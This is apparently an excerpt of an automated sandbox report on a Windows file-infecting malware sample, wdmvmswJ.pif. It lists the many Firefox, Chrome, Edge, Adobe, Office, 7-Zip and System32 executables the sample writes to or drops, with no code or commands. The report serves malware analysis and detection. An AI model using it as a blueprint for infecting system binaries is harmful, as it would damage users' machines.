                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\vds.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\vds.exeJump to dropped file
